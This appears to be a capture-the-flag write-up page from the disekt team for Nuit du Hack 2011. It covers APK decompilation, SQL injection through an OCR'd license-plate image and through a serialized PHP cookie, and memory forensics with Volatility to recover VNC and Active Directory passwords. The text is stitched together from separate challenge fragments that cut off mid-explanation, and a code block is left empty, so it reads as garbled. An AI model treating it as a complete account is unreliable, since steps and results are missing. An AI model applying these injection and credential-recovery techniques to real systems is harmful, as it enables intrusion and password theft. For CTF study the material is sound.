NDH2k11 nuit du hack 2011
This challenge was surprisingly simple. We were given an android .apk file. After converting the apk to a jar using dex2jar, we opening the jar with java decompiler JD. We immediately came across the following chunk of code.
ArrayList localArrayList = paramIntent.getStringArrayListExtra("android.speech.extra.RESULTS"); if ((!localArrayList.isEmpty()) && (a.b((String)localArrayList.get(0)))) { TextView localTextView = this.b; String str = a.a((String)localArrayList.get(0)); localTextView.setText(str); }
"Python source code is very clear and concise, and could sometimes bring out lots of clues. This is particularly true for this challenge."
This challenge proved to be rather interesting because it validated our incessant desire to run a brute force while we look for other solutions.
The python code is very clean, but after a while the inheritance duplicity in the classes and quantity of the code becomes rather dizzying. After reading through all the code, it can really be distilled down to the following important sections:
1. (server side) network.py
We were presented with a website resembling a French DMV website where we were allowed to upload images of license plates. After taking the upload, the site would then OCR the image and look up any existing infractions for the license plate.
We got extremely lucky when one of us was guessing filenames in the /upload directory and stumbled upon regplate.jpg when it contained an image of SQL injection. We re-uploaded the image and got the key.
Key: php/mysql=>el33T
We were presented with a login page along with a registration page. Poking at the inputs for these pages, we weren't able to find a vulnerability. However, one of us noticed that when "Remember me" was selected, the server set a cookie user_cookies with the value containing base64'ed serialized PHP. We found that this serialized value contained an array with two elements, one for the username and the other for the password. We found that we could inject SQL into the username element of the array, so we crafted a SQL statement to see what privileges were available.
<?php
"We have dumped the RAM of a Machine on which was running a VNC server.
The goal is to get the password of that VNC server."Using volatility 1.3 with the registry plugins by Moyix (http://moyix.blogspot.com/2009/01/memory-registry-tools.html), it is simple enough to do a scan for registry hives and dump the registry hives to csv files:
[solo@macintosh:~/Desktop/tools/volatility]$ python2.6 volatility hivescan -f ~/Desktop/forensic100/Desktop/dump.raw Offset (hex) 44759904 0x2aafb60
On a dumpe le fichier ntdis.dit d une machine executant un Active Directory Il faut recuperer le mot de passe du compte john. * * * We have dumped the ntdis.dit file of a machine running Active Directory. You must get the password associated with john's account.
We were given a physical memory dump file DumpRAM_CTF.vmem and used Volatility to analyze this image.
After running a netscan on the image, we observed the following:
jiva@h4ckb0x:~/ctf/nuitduhack2011/fore300$ vol.py netscan --profile=Win7SP1x86 -f DumpRAM_CTF.vmem Volatile Systems Volatility Framework 1.4_rc1 Offset Proto Local Address Foreign Address State Pid Owner Created WARNING : volatility.obj : Unable to find a type for pointer64, assuming int
© 2010-2011 disekt - Hosted by inetric. Drupal theme by Kiwi Themes.